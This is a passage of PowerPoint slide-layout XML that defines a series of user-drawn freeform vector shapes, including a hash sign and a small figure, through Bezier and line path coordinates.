                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135"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2" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="41"/>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6" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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6"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96"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5"/>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267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="5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Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="59"/>
                <a:ext cx="4" cy="2"/>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269"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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271"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="739"/>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Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="743"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 219"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61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60 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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281"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="739"/>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Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="739"/>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283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="73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Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="73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Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="73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291"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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293"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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297"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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299"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="730"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 202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8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4 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 74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6 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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4"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="155"/>
                      <a:pt x="23" y="150"/>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4"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="137"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="158" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
